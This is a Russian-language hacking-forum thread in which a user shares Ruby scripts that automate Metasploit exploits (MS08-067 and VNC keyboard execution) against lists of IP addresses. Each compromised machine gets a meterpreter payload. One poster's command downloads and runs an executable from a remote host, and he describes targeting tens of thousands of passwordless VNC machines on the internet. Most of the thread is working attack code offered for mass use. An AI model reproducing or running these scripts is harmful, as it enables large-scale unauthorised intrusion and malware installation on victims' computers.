Auto Metasploit Exploit

Discussion in 'Video.Antichat' started by nitob, 5 Jul 2014.

  1. nitob

    nitob New Member

    Joined:
    4 Jul 2012
    Messages:
    0
    Likes Received:
    3
    Reputations:
    4
    Увидел тему одну, код написан был на bash, открывал по 20 терминалов, смысл был в том, что загружаешь список ip, и файл инсталлится на тачке, которую смог пробить эксплоит, сейчас тот шелл код уже не работает, но есть возможность по-другому загрузить и исполнить файл. Проще всего подрубать скрипт примерно так:
    Code:
    multi_console_command -rc /root/Desktop/rrr.txt 
    
    , ну и в сам txt файл вписать доступные команды примерно такова вида:
    Code:
    upload /root/server.exe c:\\server.exe
    execute -f C:\\server.exe
    
    Для семерки пути другие.
    Решил сделать что-то подобное ну и вот,собственно, что получилось, вместо bash написал на ruby.
    В видео я не стал показывать,как заливаю файл,а просто подрубил скрипт для создания учеток.

    Ну и вот само видео:
    http://youtu.be/LhinAumm5c4
     
    #1 nitob, 5 Jul 2014
    Last edited by a moderator: 5 Jul 2014
    1 person likes this.
    1. Ups

      Ups Member

      Joined:
      11 Apr 2011
      Messages:
      113
      Likes Received:
      12
      Reputations:
      0
      Выложи пожалуйста нужные файлы\скрипты \ которые на видео.
       
      1. brown

        brown Member

        Joined:
        16 Oct 2016
        Messages:
        270
        Likes Received:
        12
        Reputations:
        1
        Выложи скрипты
         
        1. nitob

          nitob New Member

          Joined:
          4 Jul 2012
          Messages:
          0
          Likes Received:
          3
          Reputations:
          4
          Code:
          <ruby>
          
          
          
          lport = 10000
          loop do
          Thread.new do
          File.open("/root/gg.txt","r") do |file|
          
                 
                    
             file.each_line do |ip|
                  
           
                          run_single("use exploit/windows/smb/ms08_067_netapi")
          
                          run_single("set LHOST 192.168.1.172")
          
                          run_single("set PAYLOAD windows/meterpreter/bind_tcp")
          
                          run_single("set LPORT #{lport}")
          
                          run_single("set RHOST #{ip}")
          
                          #run_single("set TARGET 1")
                          run_single("set InitialAutoRunScript multi_console_command -rc /root/rc.txt")
          
                         
                      
                          run_single("exploit -j")
                        
                         lport+=1
                        
                  end
          
          end
          
          end
           
          break
                        
                         end
          
          
          </ruby>
          
           
          1. nitob

            nitob New Member

            Joined:
            4 Jul 2012
            Messages:
            0
            Likes Received:
            3
            Reputations:
            4
            Как то прочитал статью что без парольных vnc аж 40к в инете, ну и руками тоже не вариант заливать.
            Почти тоже самое только укажем новый эксплоит и изменим настройки нашего палоада.
            Code:
            <ruby>
            
            lport = 10000
            loop do
            #Thread.new do
            File.open("/root/5900.txt","r") do |file|
            file.each_line do |ip|
            
            run_single("use exploit/multi/vnc/vnc_keyboard_exec")
            
            run_single("set RHOST #{ip}")
            
            run_single("set LPORT #{lport}")
            
            run_single("set TARGET 0")
            
            run_single("set PAYLOAD windows/meterpreter/bind_tcp")
            
            run_single("set InitialAutoRunScript multi_console_command -rc /root/rc.txt")
            
            run_single("exploit -j")
            
            lport+=1
            end
            end
            #end
            
            break
            
            end
            </ruby>
            Если в первом случае у нас палоад был
            upload /root/server.exe c:\\server.exe
            execute -f C:\\server.exe

            Тут будет
            Code:
            execute -H -f cmd.exe -a '/c echo Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP"):oXMLHTTP.Open "GET", "http://IP/44444/not.exe", 0 :oXMLHTTP.Send:Set oADOStream = CreateObject("ADODB.Stream"):oADOStream.Mode = 3:oADOStream.Type = 1:oADOStream.Open:oADOStream.Write oXMLHTTP.responseBody:oADOStream.SaveToFile "not.exe", 2: createobject("Wscript.Shell").run "not.exe": > 222.vbs & cscript 222.vbs'
            
             
            1. Matrix001

              Matrix001 Active Member

              Joined:
              18 Aug 2016
              Messages:
              264
              Likes Received:
              146
              Reputations:
              3
              А нелегче просто на python-e написать ? . Скажем используя subprocess или multiprocess если надо использовать именно metasploit ? А так вообще будет лучше все написать на C++ или Python !
              P.S :
              Конечно только если для одного протокола (rdp) и без эксплоитов.